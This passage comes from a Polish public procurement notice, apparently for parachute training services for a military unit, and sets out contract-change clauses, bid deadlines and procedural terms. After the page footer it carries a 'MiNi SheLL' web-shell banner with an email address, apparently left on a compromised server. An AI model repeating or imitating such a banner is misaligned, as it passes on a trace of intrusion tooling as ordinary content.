publicznego, 3) zmiany wynagrodzenia – w przypadku zmiany przepisów prawnych (np. dotyczących stawek podatku VAT), jeżeli wpływa ona na wysokość należnego wykonawcy wynagrodzenia - zgodnie ze zmienionymi przepisami,4)	zmiany postanowień Umowy - gdy ich zmiana jest konieczna w związku ze zmianą decyzji wydawanych przez Ministra Obrony Narodowej, bądź zmianą wytycznych przełożonych Zamawiającego,5)	zmiany terminu szkolenia praktycznego spadochronowego, jeżeli z przyczyn od stron umowy niezależnych oraz niemożliwych do wcześniejszego przewidzenia (np. niekorzystne warunki atmosferyczne uniemożliwiające wykonywanie skoków spadochronowych), niemożliwe było przeprowadzenie szkolenia praktycznego w pierwotnym terminie. Powyższe zmiany nie będą powodowały naliczenia kar umownych dla Wykonawcy oraz nie będą stanowiły podstawy do jakichkolwiek innych roszczeń majątkowych ze strony Wykonawcy wobec Zamawiającego;6)	zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków;2.	Zmiana postanowień zawartej Umowy może nastąpić za zgodą obu Stron wyrażoną w formie pisemnej pod rygorem nieważności, w postaci aneksu do Umowy. 3.	W celu dokonania zmian zapisów Umowy wnioskowanych przez Wykonawcę zobowiązany jest on pisemnie wystąpić z propozycją zmiany wraz z uzasadnieniem. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-29 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z dokumentami określonymi w SWZ w rozdziale XI pkt. 14 należy złożyć za pośrednictwem platformy pod adresem https://platformazakupowa.pl/pn/41blsz/proceedings , na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1)	Zamawiający nie dopuszcza możliwości składania ofert wariantowych; 2)	Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty;3)	każdy Wykonawca może złożyć tylko po jednej ofercie na dane zadanie;4)	Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;5)	Zamawiający nie przewiduje zawarcia umowy ramowej; 6)	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów;7)	Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej;8)	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. Zamawiający nie przewiduje rozliczeń w walutach obcych;9)	postępowanie o udzielenie zamówienia prowadzi się w języku polskim;10)	Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu wykonawcy usług zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego.11)	Zamawiający informuje, że przedmiotowe usługi są w całości finansowane ze środków publicznych i zgodnie z art. 43 ust. 1 pkt. 29c ustawy z dnia 11 marca 2004r. o podatku od towarów i usług (Dz. U. z 2020 r. poz. 106, 568, 1065, 1106, 1747, 2320, 2419) podlegają ustawowemu zwolnieniu od podatku od towarów i usług).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-19 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com